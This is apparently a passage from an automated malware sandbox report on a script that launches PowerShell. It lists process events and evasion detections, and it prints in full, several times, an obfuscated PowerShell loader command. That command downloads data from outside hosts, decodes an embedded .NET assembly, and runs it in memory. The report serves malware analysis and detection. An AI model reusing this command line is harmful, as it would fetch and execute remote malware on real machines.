#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#JwJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C6B118CC push ebp; iretd 1_2_00007FF7C6B11984
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C6B129FD push ebx; iretd 1_2_00007FF7C6B12A4A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C6B1192A push ebp; iretd 1_2_00007FF7C6B11984
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C6B12B02 push eax; retf 1_2_00007FF7C6B12B11
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4379Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5434Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8600Thread sleep time: -12912720851596678s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000001.00000002.1391644987.0000025C7F050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi64_8432.amsi.csv, type: OTHER
        Source: Yara matchFile source: amsi64_8432.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8432, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#JwJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bm#gw#dqb4#gk#bwbu#ge#b#bp#hq#eq#g#d0#i##n#hq#e#b0#c4#z#bu#gk#bq#v#gw#dqbv#hm#lwb1#gu#lgbz#g4#z#b5#c4#b#b1#g8#z#bl#hi#bwbt#c8#lw#6#h##d#b0#gg#jw#7#cq#cqb1#ge#z#by#gk#bgb2#ge#cgbp#ge#bgb0#c##pq#g#cq#zgbs#hu#e#bp#g8#bgbh#gw#aqb0#hk#i##t#hi#zqbw#gw#yqbj#gu#i##n#cm#jw#s#c##jwb0#cc#ow#k#hm#yqbp#hi#aqbu#gc#i##9#c##jwbo#hq#d#bw#hm#og#v#c8#mq#w#de#oq#u#gy#aqbs#gu#bqbh#gk#b##u#gm#bwbt#c8#yqbw#gk#lwbm#gk#b#bl#c8#zwbl#hq#pwbm#gk#b#bl#gs#zqb5#d0#wgby#es#v#bo#g8#lqbf#eq#tqbx#gc#bq#w#g8#bwbu#fm#cg#5#dc#sgbb#gs#z#by#fu#cqbi#ek#qwbw#gu#rw#y#ew#bqb1#gm#b#b6#hu#twbo#di#wgbh#hy#swbx#hm#uqbn#d##tgbx#em#a#bt#ew#v##0#ee#jgbw#gs#xwb2#gk#z##9#dm#n##y#dg#m##z#gq#mqbj#gm#n#bl#dm#yg#4#d##mq#3#dq#mq#2#d##ng#5#dc#n#bi#dc#o#bl#gi#mq#n#ds#j#bs#g8#awbv#hi#eqbz#c##pq#g#e4#zqb3#c0#twbi#go#zqbj#hq#i#bt#hk#cwb0#gu#bq#u#e4#zqb0#c4#vwbl#gi#qwbs#gk#zqbu#hq#ow#k#fm#yqbs#gu#cwbp#ge#bgbz#c##pq#g#cq#b#bv#gs#bwby#hk#cw#u#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#cg#j#bz#ge#aqby#gk#bgbn#ck#ow#k#gq#eqbu#ge#bqbv#gc#zqbu#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#uwbh#gw#zqbz#gk#yqbu#hm#kq#7#cq#bqbl#hm#a#bl#hm#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#k#hu#bgbk#gu#cgbj#gw#dqbi#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#k#gw#bwbk#gc#zqbt#gu#bgb0#hm#i##9#c##j#bk#hk#bgbh#g0#bwbn#gu#bg#u#ek#bgbk#gu#e#bp#gy#k##k#g0#zqbz#gg#zqbz#ck#ow#k#gy#cgbp#hm#awbl#hq#cw#g#d0#i##k#gq#eqbu#ge#bqbv#gc#zqbu#c4#sqbu#gq#zqb4#e8#zg#o#cq#dqbu#gq#zqby#gm#b#b1#gi#kq#7#cq#b#bv#gq#zwbl#g0#zqbu#hq#cw#g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gy#cgbp#hm#awbl#hq#cw#g#c0#zwb0#c##j#bs#g8#z#bn#gu#bqbl#g4#d#bz#ds#j#bs#g8#z#bn#gu#bqbl#g4#d#bz#c##kw#9#c##j#bt#gu#cwbo#gu#cw#u#ew#zqbu#gc#d#bo#ds#j#bz#hu#c#bl#hi#dgbp#hi#aqbs#gk#d#b5#c##pq#g#cq#zgby#gk#cwbr#gu#d#bz#c##lq#g#cq#b#bv#gq#zwbl#g0#zqbu#hq#cw#7#cq#b#bp#g8#z#bl#hi#yq#g#d0#i##k#gq#eqbu#ge#bqbv#gc#zqbu#c4#uwb1#gi#cwb0#hi#aqbu#gc#k##k#gw#bwbk#gc#zqbt#gu#bgb0#hm#l##g#cq#cwb1#h##zqby#hy#aqby#gk#b#bp#hq#eq#p#ds#j#bt#ge#cgbh#gi#bwb1#hq#cw#g#d0#i#bb#fm#eqbz#hq#zqbt#c4#qwbv#g4#dgbl#hi#d#bd#do#ogbg#hi#bwbt#ei#yqbz#gu#ng#0#fm#d#by#gk#bgbn#cg#j#bs#gk#bwbk#gu#cgbh#ck#ow#k#gm#bwbu#hq#cgbp#hq#aqbv#g4#i##9#c##wwbt#hk#cwb0#gu#bq#u#fi#zqbm#gw#zqbj#hq#aqbv#g4#lgbb#hm#cwbl#g0#ygbs#hk#xq#6#do#t#bv#ge#z##o#cq#bqbh#hi#yqbi#g8#dqb0#hm#kq#7#cq#ywbv#gw#c#bv#hi#cgbo#gu#e#bp#hm#i##9#c##wwbk#g4#b#bp#gi#lgbj#e8#lgbi#g8#bqbl#f0#lgbh#gu#d#bn#gu#d#bo#g8#z##o#cc#vgbb#ek#jw#p#c4#sqbu#hy#bwbr#gu#k##k#g4#dqbs#gw#l##g#fs#bwbi#go#zqbj#hq#wwbd#f0#i#b##cg#j#bx#hu#yqbk#hi#aqbu#hy#yqby#gk#yqbu#hq#l##n#cc#l##n#cc#l##n#cc#l##n#ge#cwbw#g4#zqb0#f8#ywbv#g0#c#bp#gw#zqby#cc#l##n#cc#l##n#cc#l##n#cc#l##n#gg#d#b0#h##og#v#c8#bqbv#hi#zqbk#g8#dqbs#c4#eqbk#g4#cw#u#gu#dq#v#hm#bwb1#gw#lwbt#gk#bgbk#c4#d#b4#hq#jw#s#cc#qw#6#fw#u#by#g8#zwby#ge#bqbe#ge#d#bh#fw#jw#s#cc#zgbl#hi#cgbp#gm#eqbh#g4#a#b5#gq#cgbp#gm#jw
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bm#gw#dqb4#gk#bwbu#ge#b#bp#hq#eq#g#d0#i##n#hq#e#b0#c4#z#bu#gk#bq#v#gw#dqbv#hm#lwb1#gu#lgbz#g4#z#b5#c4#b#b1#g8#z#bl#hi#bwbt#c8#lw#6#h##d#b0#gg#jw#7#cq#cqb1#ge#z#by#gk#bgb2#ge#cgbp#ge#bgb0#c##pq#g#cq#zgbs#hu#e#bp#g8#bgbh#gw#aqb0#hk#i##t#hi#zqbw#gw#yqbj#gu#i##n#cm#jw#s#c##jwb0#cc#ow#k#hm#yqbp#hi#aqbu#gc#i##9#c##jwbo#hq#d#bw#hm#og#v#c8#mq#w#de#oq#u#gy#aqbs#gu#bqbh#gk#b##u#gm#bwbt#c8#yqbw#gk#lwbm#gk#b#bl#c8#zwbl#hq#pwbm#gk#b#bl#gs#zqb5#d0#wgby#es#v#bo#g8#lqbf#eq#tqbx#gc#bq#w#g8#bwbu#fm#cg#5#dc#sgbb#gs#z#by#fu#cqbi#ek#qwbw#gu#rw#y#ew#bqb1#gm#b#b6#hu#twbo#di#wgbh#hy#swbx#hm#uqbn#d##tgbx#em#a#bt#ew#v##0#ee#jgbw#gs#xwb2#gk#z##9#dm#n##y#dg#m##z#gq#mqbj#gm#n#bl#dm#yg#4#d##mq#3#dq#mq#2#d##ng#5#dc#n#bi#dc#o#bl#gi#mq#n#ds#j#bs#g8#awbv#hi#eqbz#c##pq#g#e4#zqb3#c0#twbi#go#zqbj#hq#i#bt#hk#cwb0#gu#bq#u#e4#zqb0#c4#vwbl#gi#qwbs#gk#zqbu#hq#ow#k#fm#yqbs#gu#cwbp#ge#bgbz#c##pq#g#cq#b#bv#gs#bwby#hk#cw#u#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#cg#j#bz#ge#aqby#gk#bgbn#ck#ow#k#gq#eqbu#ge#bqbv#gc#zqbu#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#uwbh#gw#zqbz#gk#yqbu#hm#kq#7#cq#bqbl#hm#a#bl#hm#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#k#hu#bgbk#gu#cgbj#gw#dqbi#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#k#gw#bwbk#gc#zqbt#gu#bgb0#hm#i##9#c##j#bk#hk#bgbh#g0#bwbn#gu#bg#u#ek#bgbk#gu#e#bp#gy#k##k#g0#zqbz#gg#zqbz#ck#ow#k#gy#cgbp#hm#awbl#hq#cw#g#d0#i##k#gq#eqbu#ge#bqbv#gc#zqbu#c4#sqbu#gq#zqb4#e8#zg#o#cq#dqbu#gq#zqby#gm#b#b1#gi#kq#7#cq#b#bv#gq#zwbl#g0#zqbu#hq#cw#g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gy#cgbp#hm#awbl#hq#cw#g#c0#zwb0#c##j#bs#g8#z#bn#gu#bqbl#g4#d#bz#ds#j#bs#g8#z#bn#gu#bqbl#g4#d#bz#c##kw#9#c##j#bt#gu#cwbo#gu#cw#u#ew#zqbu#gc#d#bo#ds#j#bz#hu#c#bl#hi#dgbp#hi#aqbs#gk#d#b5#c##pq#g#cq#zgby#gk#cwbr#gu#d#bz#c##lq#g#cq#b#bv#gq#zwbl#g0#zqbu#hq#cw#7#cq#b#bp#g8#z#bl#hi#yq#g#d0#i##k#gq#eqbu#ge#bqbv#gc#zqbu#c4#uwb1#gi#cwb0#hi#aqbu#gc#k##k#gw#bwbk#gc#zqbt#gu#bgb0#hm#l##g#cq#cwb1#h##zqby#hy#aqby#gk#b#bp#hq#eq#p#ds#j#bt#ge#cgbh#gi#bwb1#hq#cw#g#d